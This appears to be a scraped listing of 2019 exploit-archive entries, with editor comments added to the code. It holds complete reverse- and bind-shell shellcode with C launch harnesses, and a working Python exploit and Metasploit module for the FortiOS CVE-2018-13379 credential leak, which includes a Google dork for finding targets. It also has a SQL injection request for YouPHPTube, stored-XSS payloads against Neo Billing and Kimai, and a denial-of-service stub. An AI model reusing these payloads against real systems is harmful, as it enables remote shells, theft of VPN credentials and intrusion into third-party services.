157 bytes small Linux/MIPS64 reverse (localhost:4444/TCP) shell shellcode.

MD5 | 943dc4bcee3d0b33275bf2fdf8a0cb86

/*
* # Reverse shell shellcode for Linux MIPS64 (mips64el)
* # Default port: tcp/4444
* # Host: localhost
* # Date: August 19 - 2019
* # Author: Antonio de la Piedra
* # Tested on: MIPS Malta - Linux debian-mips64el 4.9.0-3-5kc-malta
* # Size: 157 bytes
* # Compile with: gcc -fno-stack-protector -z execstack main.c -o main -g
* #   (-z execstack is the part that matters here: the payload lives in the
* #   writable code[] array in .data, and the flag is what lets main() jump
* #   into it; without it the indirect call faults)
*/

#include <stdio.h>
#include <string.h>

/*
.text
.global __start
__start:

dli $s4, -3          # s4 = -3  -> nor(s4, 0) = 2; built this way so no 0x00 byte is encoded
dli $s5, -17         # s5 = -17 -> nor(s5, 0) = 16 = sizeof(struct sockaddr_in)
nor $a0,$s4,$zero    # a0 = 2 (AF_INET)
nor $a1,$s4,$zero    # a1 = 2 (SOCK_STREAM)
slti $a2,$zero,-1    # a2 = 0 (0 < -1 is false) -> protocol 0
li $v0,5040          # __NR_socket on the n64 ABI
syscall 0x40404      # the code field 0x40404 only serves to keep the encoding free of 0x00

sw $v0, -32($sp)     # park the socket fd in scratch space below sp (never reserved) ...
lw $a0, -32($sp)     # ... and reload it into a0; presumably done this way because
                     # "move $a0,$v0" (or $4,$2,$0 = 0x00402025) would encode a 0x00 byte

nor $t0,$s4,$zero    # t0 = 2 (n64 register names: $t0 = $12, $t1 = $13, $t2 = $14)
sw $t0, -12($sp)     # sin_family = AF_INET; the two high bytes are overwritten by the port next
dli $t2,0x5c11
sw $t2,-10($sp)      # sin_port = htons(4444). -10($sp) is only 2-byte aligned, so this is an
                     # unaligned sw; it works because Linux/MIPS fixes up unaligned accesses
                     # in the kernel by default -- TODO confirm this is still enabled on the target
dli $t1,0x0101017f
sw $t1,-8($sp)       # sin_addr = 127.1.1.1 (a loopback address whose bytes are all non-zero)
daddiu $a1,$sp,-12   # a1 = &sockaddr_in
nor $a2,$s5,$zero    # a2 = 16 (addrlen)
dli $v0,5041         # __NR_connect
syscall 0x40404      # a0 (the fd) survives the syscall: MIPS/Linux only writes v0, v1 and a3

nor $a1,$s4,$zero    # a1 = 2: dup2(sock, 2), then 1, then 0 -- a0 still holds the socket fd
dli $s0, -1          # loop sentinel
loop:
dli $v0,5032         # __NR_dup2
syscall 0x40404
daddi $a1,$a1,-1
bne $a1,$s0,loop     # the byte dump has no nop after this bne, so the lui from the next
                     # dli sits in the branch delay slot and runs every iteration (harmless)
dli $t0,0x69622f2f   # "//bi" little-endian; the double slash pads the path to 8 bytes
sw $t0,-12($sp)
dli $t1,0x68732f6e   # "n/sh"
dli $t1,0x68732f6e   # (line duplicated in this listing; the byte dump below has it once)
sw $t1,-8($sp)
sw $zero,-4($sp)     # NUL terminator -> "//bin/sh\0" at sp-12
daddiu $a0,$sp,-12   # path
slti $a1,$zero,-1    # argv = NULL
slti $a2,$zero,-1    # envp = NULL
dli $v0,5057         # __NR_execve
syscall 0x40404
.align 8
*/

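/* Raw payload, one 32-bit little-endian MIPS64 instruction per string literal.
 * The escapes were restored from a rendering that had dropped the backslashes
 * ("xfd" -> "\xfd").  No byte is 0x00, so strlen() sees the whole buffer
 * (156 bytes; sizeof(code) is 157 with the terminator).  Register names in the
 * comments follow the n64 ABI used by the listing above ($t0 = $12, $t1 = $13,
 * $t2 = $14).
 */
unsigned char code[] =
    "\xfd\xff\x14\x24"  /* addiu $s4,$zero,-3   (the listing has this once;      */
    "\xfd\xff\x14\x24"  /* addiu $s4,$zero,-3    the repeat is harmless -- verify) */
    "\xef\xff\x15\x24"  /* addiu $s5,$zero,-17                                    */
    "\x27\x20\x80\x02"  /* nor $a0,$s4,$zero    -> 2  (AF_INET)                   */
    "\x27\x28\x80\x02"  /* nor $a1,$s4,$zero    -> 2  (SOCK_STREAM)               */
    "\xff\xff\x06\x28"  /* slti $a2,$zero,-1    -> 0  (protocol)                  */
    "\xb0\x13\x02\x24"  /* addiu $v0,$zero,5040 (__NR_socket, n64)                */
    "\x0c\x01\x01\x01"  /* syscall 0x40404                                        */
    "\xe0\xff\xa2\xaf"  /* sw $v0,-32($sp)      park the socket fd                */
    "\xe0\xff\xa4\x8f"  /* lw $a0,-32($sp)      reload it into a0                 */
    "\x27\x60\x80\x02"  /* nor $t0,$s4,$zero    -> 2                              */
    "\xf4\xff\xac\xaf"  /* sw $t0,-12($sp)      sin_family = AF_INET              */
    "\x11\x5c\x0e\x24"  /* addiu $t2,$zero,0x5c11                                 */
    "\xf6\xff\xae\xaf"  /* sw $t2,-10($sp)      sin_port = htons(4444), unaligned */
    "\x01\x01\x0d\x3c"  /* lui $t1,0x0101                                         */
    "\x7f\x01\xad\x35"  /* ori $t1,$t1,0x017f   -> 0x0101017f                     */
    "\xf8\xff\xad\xaf"  /* sw $t1,-8($sp)       sin_addr = 127.1.1.1              */
    "\xf4\xff\xa5\x67"  /* daddiu $a1,$sp,-12   &sockaddr_in                      */
    "\x27\x30\xa0\x02"  /* nor $a2,$s5,$zero    -> 16 (addrlen)                   */
    "\xb1\x13\x02\x24"  /* addiu $v0,$zero,5041 (__NR_connect)                    */
    "\x0c\x01\x01\x01"  /* syscall                                                */
    "\x27\x28\x80\x02"  /* nor $a1,$s4,$zero    -> 2                              */
    "\xff\xff\x10\x24"  /* addiu $s0,$zero,-1   loop sentinel                     */
    "\xa8\x13\x02\x24"  /* loop: addiu $v0,$zero,5032 (__NR_dup2)                 */
    "\x0c\x01\x01\x01"  /* syscall              dup2(sock, a1)                    */
    "\xff\xff\xa5\x60"  /* daddi $a1,$a1,-1                                       */
    "\xfc\xff\xb0\x14"  /* bne $a1,$s0,loop                                       */
    "\x62\x69\x0c\x3c"  /* lui $t0,0x6962       (branch delay slot, harmless)     */
    "\x2f\x2f\x8c\x35"  /* ori $t0,$t0,0x2f2f   -> "//bi"                         */
    "\xf4\xff\xac\xaf"  /* sw $t0,-12($sp)                                        */
    "\x73\x68\x0d\x3c"  /* lui $t1,0x6873                                         */
    "\x6e\x2f\xad\x35"  /* ori $t1,$t1,0x2f6e   -> "n/sh"                         */
    "\xf8\xff\xad\xaf"  /* sw $t1,-8($sp)                                         */
    "\xfc\xff\xa0\xaf"  /* sw $zero,-4($sp)     NUL terminator                    */
    "\xf4\xff\xa4\x67"  /* daddiu $a0,$sp,-12   path = "//bin/sh"                 */
    "\xff\xff\x05\x28"  /* slti $a1,$zero,-1    argv = NULL                       */
    "\xff\xff\x06\x28"  /* slti $a2,$zero,-1    envp = NULL                       */
    "\xc1\x13\x02\x24"  /* addiu $v0,$zero,5057 (__NR_execve)                     */
    "\x0c\x01\x01\x01"; /* syscall                                                */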

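/*
 * Harness: print the payload length and jump into it.  The indirect call only
 * works when the binary was linked with an executable data segment (see the
 * compile line in the header); on success execve() never returns.
 */
int main(int argc, char **argv)
{
    void (*entry)(void);

    (void)argc;
    (void)argv;

    /* strlen() is meaningful only because the payload contains no 0x00 byte;
     * it reports 156 here (sizeof(code) == 157 counts the terminator).
     * %zu is the correct conversion for size_t. */
    printf("Shellcode Length: %zu\n", strlen((const char *)code));

    /* Object-to-function pointer conversion is implementation-defined in
     * ISO C; GCC accepts it, which is all this harness targets. */
    entry = (void (*)(void))(void *)code;
    entry();

    return 0;
}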


129 bytes small Linux/x86_64 bind (4444/TCP) shell (/bin/sh) + password (pass) shellcode.

MD5 | 4f69a9a7b34a1231bc105cb3374d328e

/*
; Title : Linux/x86_64 - Bind Shell (/bin/sh) with Password (configurable) (129 bytes)
; Date : 2019-08-18
; Author : Gonçalo Ribeiro (@goncalor)
; Website : goncalor.com
; SLAE64-ID : 1635

global _start

%define pass "pass" ; stored in clear text inside the payload; must fit the 16-byte read() buffer below
%define port 0x5c11 ; htons(4444)

_start:
jmp real_start
password: db pass
pass_len: db $-password

real_start:
socket:
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; __NR_socket = 41
; On success, a file descriptor for the new socket is returned

push 41
pop rax
push 2
pop rdi
push 1
pop rsi
cdq ; copies rax's bit 31 to all bits of edx (zeroes rdx)
syscall

push rax
pop rdi

bind:
; server.sin_family = AF_INET; short
; server.sin_port = htons(4444); unsigned short
; server.sin_addr.s_addr = INADDR_ANY; unsigned long
; bzero(&server.sin_zero, 8);
;
; https://beej.us/guide/bgnet/html/multi/sockaddr_inman.html
; struct sockaddr_in {
; short sin_family;
; unsigned short sin_port;
; struct in_addr sin_addr;
; char sin_zero[8];
; };
;
; bind(sock, (struct sockaddr *)&server, sockaddr_len)
; INADDR_ANY = 0
; AF_INET = 2
; __NR_bind = 49
; On success, zero is returned

xor eax, eax ; shorter and will still zero the upper bytes
push rax ; sin_zero
push ax
push ax ; sin_addr
push word port
push word 2

; bind
add al, 49
push rsp
pop rsi
add dl, 16 ; sizeof(sockaddr_in)
syscall

listen:
; listen(sock, 2)
; __NR_listen = 50
; On success, zero is returned

mov al, 50 ; relies on bind() having left rax == 0: if bind failed (e.g. port already in
           ; use, rax = -EADDRINUSE) the upper bytes stay set and this becomes a bogus
           ; syscall number, so every later "mov al, N" fails the same way
xor esi, esi
mov sil, 2
syscall

accept:
; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
; __NR_accept = 43
; On success, a file descriptor is returned

mov al, 43
xor esi, esi ; addr = NULL
;xor rdx, rdx ; already zeroed
; NOTE: rdx is not actually zero here -- it still holds 16 from "add dl, 16" in bind
; (syscall only clobbers rcx and r11). This is harmless because the kernel ignores
; addrlen when addr is NULL, and read() below sets dl = 16 again anyway.
syscall

push rax

;close:
; close(sock)
; __NR_close = 3
; returns zero on success

; closing is not strictly necessary
;mov al, 3
;syscall

dup2:
; dup2(new, 0);
; dup2(new, 1);
; dup2(new, 2);
; __NR_dup2 = 33
; On success, return the new file descriptor

pop rdi ; "new" was pushed in accept()
push 2
pop rsi

dup2_loop:
mov al, 33
syscall
dec esi
jns dup2_loop

read_password:
; read(int fd, void *buf, size_t count)
; On success, the number of bytes read is returned

;xor eax, eax ; already done by dup2 (the last dup2(new, 0) returned 0)
;rdi = "new" ; already done in dup2
push rax
push rax ; create space for "buf" in the stack (16 zero bytes)
push rsp
pop rsi ; rsi = *buf
mov dl, 16 ; at most 16 bytes are read, so the password cannot be longer than that
syscall

compare_password:
xor ecx, ecx
lea rdi, [rel pass_len]
mov cl, [rdi]
sub rdi, rcx ; rdi = password (it sits pass_len bytes before pass_len)
cld
repz cmpsb ; compares only pass_len bytes: this is a prefix match, so "pass\n" as sent by
           ; nc is accepted and anything after the password is ignored
jne exit

execve:
; execve(const char *path, char *const argv[], char *const envp[])
; rdi, path = (char*) /bin//sh, 0x00 (double slash for padding)
; rsi, argv = (char**) (/bin//sh, 0x00)
; rdx, envp = &0x00

xor eax, eax
push rax
push rsp
pop rdx ; *rdx = &0x00

mov rsi, 0x68732f2f6e69622f ; rax2 -S $(echo /bin//sh | rev)
push rsi
push rsp
pop rdi ; rdi = (char*) /bin//sh

push rax
push rdi
push rsp
pop rsi ; rsi = (char**) (/bin//sh, 0x00)

mov al, 59
syscall

exit:
;xor eax, eax ; upper bytes are zero after read
mov al, 60
syscall
*/


#include <stdio.h>
#include <string.h>

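/* 129-byte payload with no 0x00 byte (so strlen() reports all of it).  The
 * escapes were restored from a rendering that had dropped the backslashes
 * ("xeb" -> "\xeb").  One literal per instruction, in the order of the NASM
 * listing above; the password is stored in clear text at offset 2.
 */
char code[] =
    "\xeb\x05"                      /* jmp short real_start (over the data)       */
    "\x70\x61\x73\x73"              /* password: db "pass"                        */
    "\x04"                          /* pass_len: db 4                             */
    /* socket(AF_INET, SOCK_STREAM, 0) */
    "\x6a\x29\x58"                  /* push 41 ; pop rax                          */
    "\x6a\x02\x5f"                  /* push 2  ; pop rdi                          */
    "\x6a\x01\x5e"                  /* push 1  ; pop rsi                          */
    "\x99"                          /* cdq -> rdx = 0                             */
    "\x0f\x05"                      /* syscall                                    */
    "\x50\x5f"                      /* push rax ; pop rdi   (rdi = sock)          */
    /* bind(sock, {AF_INET, htons(4444), INADDR_ANY}, 16) */
    "\x31\xc0"                      /* xor eax, eax                               */
    "\x50"                          /* push rax              sin_zero             */
    "\x66\x50\x66\x50"              /* push ax ; push ax     sin_addr = 0.0.0.0   */
    "\x66\x68\x11\x5c"              /* push word 0x5c11      sin_port             */
    "\x66\x6a\x02"                  /* push word 2           sin_family           */
    "\x04\x31"                      /* add al, 49                                 */
    "\x54\x5e"                      /* push rsp ; pop rsi                         */
    "\x80\xc2\x10"                  /* add dl, 16   (rdx stays 16 until read())   */
    "\x0f\x05"                      /* syscall                                    */
    /* listen(sock, 2) -- assumes bind() left rax == 0 */
    "\xb0\x32"                      /* mov al, 50                                 */
    "\x31\xf6\x40\xb6\x02"          /* xor esi, esi ; mov sil, 2                  */
    "\x0f\x05"                      /* syscall                                    */
    /* accept(sock, NULL, <rdx still 16; ignored because addr is NULL>) */
    "\xb0\x2b"                      /* mov al, 43                                 */
    "\x31\xf6"                      /* xor esi, esi                               */
    "\x0f\x05"                      /* syscall                                    */
    "\x50"                          /* push rax   (new)                           */
    /* dup2(new, 2), dup2(new, 1), dup2(new, 0) */
    "\x5f"                          /* pop rdi                                    */
    "\x6a\x02\x5e"                  /* push 2 ; pop rsi                           */
    "\xb0\x21"                      /* dup2_loop: mov al, 33                      */
    "\x0f\x05"                      /* syscall                                    */
    "\xff\xce"                      /* dec esi                                    */
    "\x79\xf8"                      /* jns dup2_loop                              */
    /* read(new, buf, 16) -- rax == 0 after dup2(new, 0) */
    "\x50\x50"                      /* push rax ; push rax   16-byte zeroed buf   */
    "\x54\x5e"                      /* push rsp ; pop rsi                         */
    "\xb2\x10"                      /* mov dl, 16                                 */
    "\x0f\x05"                      /* syscall                                    */
    /* compare the first pass_len bytes of buf with the password (prefix match) */
    "\x31\xc9"                      /* xor ecx, ecx                               */
    "\x48\x8d\x3d\xad\xff\xff\xff"  /* lea rdi, [rel pass_len]                    */
    "\x8a\x0f"                      /* mov cl, [rdi]                              */
    "\x48\x29\xcf"                  /* sub rdi, rcx  -> rdi = password            */
    "\xfc"                          /* cld                                        */
    "\xf3\xa6"                      /* repz cmpsb                                 */
    "\x75\x1a"                      /* jne exit                                   */
    /* execve("/bin//sh", ["/bin//sh", NULL], [NULL]) */
    "\x31\xc0"                      /* xor eax, eax                               */
    "\x50\x54\x5a"                  /* push rax ; push rsp ; pop rdx     envp     */
    "\x48\xbe\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* mov rsi, "/bin//sh"             */
    "\x56\x54\x5f"                  /* push rsi ; push rsp ; pop rdi     path     */
    "\x50\x57\x54\x5e"              /* push rax ; push rdi ; push rsp ; pop rsi   */
    "\xb0\x3b"                      /* mov al, 59                                 */
    "\x0f\x05"                      /* syscall                                    */
    /* exit: reached only when the password did not match */
    "\xb0\x3c"                      /* mov al, 60                                 */
    "\x0f\x05";                     /* syscall                                    */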

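/*
 * Harness: print the payload length, then jump into it.  code[] sits in the
 * writable data segment, so this only works when the binary was built with an
 * executable data segment (e.g. gcc -z execstack); on a successful execve()
 * the call never returns.
 */
int main(void)
{
    /* The payload has no 0x00 byte, so strlen() reports the full 129 bytes.
     * %zu is the correct conversion for the size_t that strlen() returns. */
    printf("length: %zu\n", strlen(code));

    /* Object-to-function pointer conversion is implementation-defined in
     * ISO C; GCC accepts it, which is all this harness targets. */
    ((void (*)(void))(void *)code)();

    return 0;
}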


FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 suffer from a credential disclosure vulnerability.

MD5 | a022f0e2fde0c635d9836c8aef10e213

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

# Exploit SSLVPN Fortinet - FortiOs
#!/usr/bin/env python
import requests, sys, time
import urllib3
# Silence urllib3's InsecureRequestWarning: every request below passes
# verify=False (the appliance is presumably running a self-signed certificate).
urllib3.disable_warnings()


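def leak(host, port):
    """Fetch /dev/cmdb/sslvpn_websession through the fgt_lang path traversal.

    The response is saved verbatim to ``sslvpn_websession_<host>.dat`` in the
    current directory and handed to ``parse``.  ``port`` is a string because
    it is concatenated straight into the URL.

    Returns True when the body carried the ``var fgt_lang =`` wrapper that the
    vulnerable handler puts around the file, False otherwise (including on a
    connection error).  TLS verification is disabled deliberately; the
    appliance is not expected to present a trusted certificate.
    """
    print("[!] Leak information...")
    url = "https://" + host + ":" + port + "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    headers = {"User-Agent": "Mozilla/5.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
    try:
        r = requests.get(url, headers=headers, verify=False, stream=True)
        # decode_content=True: the request advertises gzip/deflate, and a raw
        # read would otherwise return the still-compressed body, hiding the marker.
        img = r.raw.read(decode_content=True)
    except requests.exceptions.ConnectionError:
        return False

    # Without the wrapper we most likely received an ordinary page rather
    # than the session table; do not write or parse it.
    if b"var fgt_lang =" not in img:
        return False

    # Binary mode: the file is a raw memory dump, not text (also keeps the
    # write working under Python 3).
    with open("sslvpn_websession_" + host + ".dat", "wb") as f:
        f.write(img)
    print("[>] Save to file ....")
    parse(host)
    print("\n")
    return True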
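def is_character_printable(s):
    """Return True when every character of ``s`` is printable 7-bit ASCII.

    The rendering had dropped the comparison operators of this expression;
    it is restored as the usual 0x20..0x7e range check (DEL excluded).  An
    empty string is vacuously printable, which is what ``all`` gives.
    """
    return all(32 <= ord(c) < 127 for c in s)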

def is_printable(byte):
    """Return ``byte`` unchanged when it is printable ASCII, else a '.' placeholder."""
    if not is_character_printable(byte):
        return '.'
    return byte

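def read_bytes(host, chunksize=8192):
    """Yield the saved dump ``sslvpn_websession_<host>.dat`` one character at a time.

    Each item is a one-character ``str`` on both Python 2 and 3: iterating a
    ``bytes`` object directly under Python 3 would yield ints and break
    ``is_printable``, so the chunk goes through ``bytearray`` + ``chr``.
    Bytes >= 0x80 map to characters with the same ordinal and are therefore
    still reported as non-printable by ``is_character_printable``.

    The file is read in ``chunksize`` blocks; the log line names the same
    file that is opened (the original message was missing the underscore).
    """
    name = "sslvpn_websession_" + host + ".dat"
    print("[>] Read bytes from > " + name)
    with open(name, "rb") as f:
        while True:
            chunk = f.read(chunksize)
            if not chunk:
                break
            for value in bytearray(chunk):
                yield chr(value)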
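def parse(host):
    """Print the saved dump as 61-column text rows.

    Non-printable bytes are shown as '.'; rows that consist of nothing but
    that placeholder are skipped.  Unlike the original, a trailing partial
    row is printed too instead of being silently dropped.
    """
    print("[!] Parsing Information...")
    width = 61
    filler = "." * width
    row = ""
    count = 0
    for byte in read_bytes(host):
        row += is_printable(byte)
        count += 1
        # same cut points as the original (memory_address % 61 == 60)
        if count % width == 0:
            if row != filler:
                print(row)
            row = ""
    if row and row.strip(".") != "":
        print(row)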

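def check(host, port):
    """Probe the traversal URL and return True only on an HTTP 200 reply.

    404, any other status and any request failure all yield False.  A 200
    on its own is a weak signal (a patched or unrelated handler may answer
    200 with an ordinary page); ``leak`` confirms by looking for the
    ``var fgt_lang =`` wrapper in the body.  Only request-level exceptions
    are swallowed; the original bare ``except`` also ate KeyboardInterrupt.
    """
    print("[!] Check vuln...")
    uri = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
    try:
        r = requests.get("https://" + host + ":" + port + uri, verify=False)
    except requests.exceptions.RequestException:
        return False
    return r.status_code == 200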
def main(host, port):
    """Run the status probe and, when it passes, dump and parse the session file."""
    print("[+] Start exploiting....")
    if not check(host, port):
        print("[X] Target not vulnerable.")
        return
    print("[+] Target is vulnerable!")
    leak(host, port)

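if __name__ == "__main__":
    # host is an IP or DNS name; port stays a string because the URL
    # builders concatenate it.
    if len(sys.argv) < 3:
        print("Use: python {} ip/dns port".format(sys.argv[0]))
        sys.exit(1)  # non-zero so wrappers can tell a usage error apart
    host = sys.argv[1]
    port = sys.argv[2]
    main(host, port)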


This Metasploit module exploits FortiOS versions 5.6.3 through 5.6.7 and 6.0.0 through 6.0.4 to leverage a credential disclosure vulnerability by reading the /dev/cmdb/sslvpn_websession file.

MD5 | 956f30465640700e922f5cf3e4a9bdf6

# Exploit Title: FortiOS Leak file - Reading login/passwords in clear text.
# Google Dork: intext:"Please Login" inurl:"/remote/login"
# Date: 17/08/2019
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://www.fortinet.com/
# Software Link: https://www.fortinet.com/products/fortigate/fortios.html
# Version: This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
# Tested on: 5.6.6
# CVE : CVE-2018-13379

require 'msf/core'
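class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Post::File

  # Path-traversal request that makes the fgt_lang handler return the
  # SSL-VPN session table instead of a language file.
  TRAVERSAL_URI = '/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession'.freeze
  # The handler wraps what it returns in a JS assignment; a 200 response
  # without it is most likely an ordinary page, not the leaked file.
  LEAK_MARKER = 'var fgt_lang ='.freeze
  # Width of the printable rows parse() prints.
  ROW_WIDTH = 60

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SSL VPN FortiOs - System file leak',
      'Description'    => %q{
        FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.
        This exploit read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
        This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
      },
      'References'     =>
        [
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-13379' ]
        ],
      'Author'         => [ 'lynx (Carlos Vieira)' ],
      'License'        => MSF_LICENSE,
      'DefaultOptions' =>
        {
          'RPORT' => 443,
          'SSL'   => true
        }
    ))
  end

  # Local file the leaked session table is written to (one per RHOST).
  def dump_filename
    "msf_sslwebsession_#{datastore['RHOST']}.bin"
  end

  # Request the session file, store it locally and print its printable rows.
  def run
    print_good("Checking target...")
    # send_request_raw on purpose: send_request_cgi would normalise or
    # URL-encode the traversal sequence and the request would no longer hit.
    res = send_request_raw('uri' => TRAVERSAL_URI)

    if res.nil?
      print_error("Ow crap, try again...")
      return
    end

    case res.code
    when 200
      print_good("Target is Vulnerable!")
      data = res.body.to_s
      unless data.include?(LEAK_MARKER)
        print_warning("Response lacks the '#{LEAK_MARKER}' wrapper; the saved file may be an ordinary page rather than the session table")
      end
      filename = dump_filename
      File.delete(filename) if File.exist?(filename)
      file_local_write(filename, data)
      print_good("Parsing binary file.......")
      parse
    when 404
      print_error("Target not Vulnerable")
    else
      print_error("Ow crap, try again...")
    end
  end

  # Print the dump in ROW_WIDTH-column rows with non-printable bytes shown as
  # '.', skipping rows that are nothing but that filler.
  def parse
    filler = '.' * ROW_WIDTH
    # Binary mode, and the block form so the handle is closed even when gsub
    # raises.  In text mode the data would be tagged with the default external
    # encoding (normally UTF-8) and gsub would raise "invalid byte sequence"
    # on the arbitrary bytes a memory dump contains.
    File.open(dump_filename, 'rb') do |fh|
      fh.each_line do |line|
        printable = line.gsub(/[^[:print:]]/, '.')
        printable.scan(/.{1,#{ROW_WIDTH}}/m).each do |row|
          print_good(row) unless row == filler
        end
      end
    end
  end
end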


YouPHPTube version 7.2 suffers from a remote SQL injection vulnerability in userCreate.json.php.

MD5 | 0c5a7e8e6f6f45c7826e5a19a22f0dea

# Exploit Title: YouPHPTube < 7.3 SQL Injection
# Google Dork: /
# Date: 19.08.2019
# Exploit Author: Fabian Mosch, r-tec IT Security GmbH
# Vendor Homepage: https://www.youphptube.com/
# Software Link: https://github.com/YouPHPTube/YouPHPTube
# Version: < 7.3
# Tested on: Linux/Windows
# CVE : CVE-2019-14430

The "user" and "pass" parameters of the user registration function (the POST fields named "user" and "pass" in the request below) are vulnerable to SQL injection. By submitting an HTTP POST request to "/objects/userCreate.json.php" an attacker can query the database and, for example, read an administrator's hashed credentials.

Example Request:

POST /objects/userCreate.json.php HTTP/1.1
Host: vulnerablehost.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
[SomeHeaders and Cookies]

user=tes'INJECTHERE&pass=test'INJECTHERE &email=test%40example.com&name=test&captcha=xxxxx

Methods for DB-Extraction are:


- Boolean-based blind

- Error-based

- AND/OR time-based blind


The vulnerability was fixed with this commit:
https://github.com/YouPHPTube/YouPHPTube/commit/891843d547f7db5639925a67b7f2fd66721f703a


The Mandos system allows computers to have encrypted root file systems and at the same time be capable of remote or unattended reboots. The computers run a small client program in the initial RAM disk environment which will communicate with a server over a network. All network communication is encrypted using TLS. The clients are identified by the server using an OpenPGP key that is unique to each client. The server sends the clients an encrypted password. The encrypted password is decrypted by the clients using the same OpenPGP key, and the password is then used to unlock the root file system.

MD5 | dc129218c58f33b7c68e4cb7a34ecd6a


Neo Billing version 3.5 suffers from a persistent cross site scripting vulnerability.

MD5 | 7d47b4f46e7a051cb9a4041134f8126a

# Exploit Title: Neo Billing 3.5 - Stored Cross Site Scripting Vulnerability
# Date: 18.8.2019.
# Exploit Author: n1x_ [MS-WEB]
# Vendor Homepage: https://codecanyon.net/item/neo-billing-accounting-invoicing-and-crm-software/20896547
# Version: 3.5
# CWE : CWE-79

[Description]

# Neo Billing is an accounting, invoicing and CRM PHP script, with over 500 installations.
# Due to improper input fields data filtering, version 3.5 (and possibly previous versions), are affected by a stored XSS vulnerability.

[Proof of Concept]

# 1. Log in as a customer (regular user account) [//host/neo/crm/user/login]
# 2. Closing an input field tag and injecting code into 'Subject' or 'Description' text fields [//host/neo/crm/tickets/addticket]
# 3. The code is stored and rendered at [//host/neo/crm/tickets] or [//host/neo/crm/tickets/thread/?id=ticketid]

[Example payloads]

# Example payload: "> followed by an HTML tag (the tag itself was stripped from this rendering)
# Example payload: "><script>alert(document.cookie)</script>

[POST Request]

POST /neo/crm/tickets/addticket HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: //host/neo/crm/tickets/addticket
Content-Type: multipart/form-data; boundary=---------------------------899768029113033755249127523
Content-Length: 694
Cookie: __cfduid=d99e93624fe63d5aa953bf59cd28cdafe1566123585; ci_sessions=nel35vfb2hi5f9tt29l43ogn36hdmilj
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="title"

"><script>alert('XSS')</script>
-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="content"

"><script>alert('XSS')</script>


-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523
Content-Disposition: form-data; name="userfile"; filename=""
Content-Type: application/octet-stream


-----------------------------899768029113033755249127523--


Kimai version 2 suffers from a persistent cross site scripting vulnerability.

MD5 | d467918811040b33c88487e63e4fa7b0

# Exploit Title: Kimai 2- persistent cross-site scripting (XSS)
# Date: 07/15/2019
# Exploit Author: osamaalaa
# Vendor Homepage: [link]
# Software Link: https://github.com/kevinpapst/kimai2
# Fixed on Github : https://github.com/kevinpapst/kimai2/pull/962
# Version: 2

1-Normal user will try to add timesheet from this link http://localhost/index.php/en/timesheet/create

2-Add this payload "> in the description (the HTML tag that followed "> was stripped when this page was rendered; it is also missing from the request body below)

3-Save The changes

4-refresh and we have alert pop up!

The Request POC :

POST /index.php/en/timesheet/create HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 392
Connection: close
Referer: http://localhost
Cookie: PHPSESSID=auehoprhqk3qspncs5s08ucobv

timesheet_edit_form[begin]=2019-08-17 13:02&timesheet_edit_form[end]=2019-08-18 00:00&timesheet_edit_form[customer]=12&timesheet_edit_form[project]=24&timesheet_edit_form[activity]=27&timesheet_edit_form[description]= ">&timesheet_edit_form[tags]=&timesheet_edit_form[_token]=19Owg2YgIMPFUcEP9NVibhqEpKwkwhVt5j-BTJysyK0


RAR Password Recovery version 1.80 suffers from a user name and registration code denial of service vulnerability.

MD5 | c8006c83d8c82155250a442fd9ef4c2b

# Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit
# Date: 16.08.2019
# Vendor Homepage:https://www.top-password.com/
# Software Link: https://www.top-password.com/download/RARPRSetup.exe
# Exploit Author: Achilles
# Tested Version: v1.80
# Tested on: Windows 7 x64
# Windows XP SP3


# 1.- Run the python code: RAR Password Recovery.py
# 2.- Open Evil.txt (the file the script writes; the name is case-sensitive on some systems) and copy its content to the clipboard
# 3.- Open RAR Password Recovery and click 'Register'
# 4.- Paste the content of Evil.txt into the field 'User Name and Registration Code'
